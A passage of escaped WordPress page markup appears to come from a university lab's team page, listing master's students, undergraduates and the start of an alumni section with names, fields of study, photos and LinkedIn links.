23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a 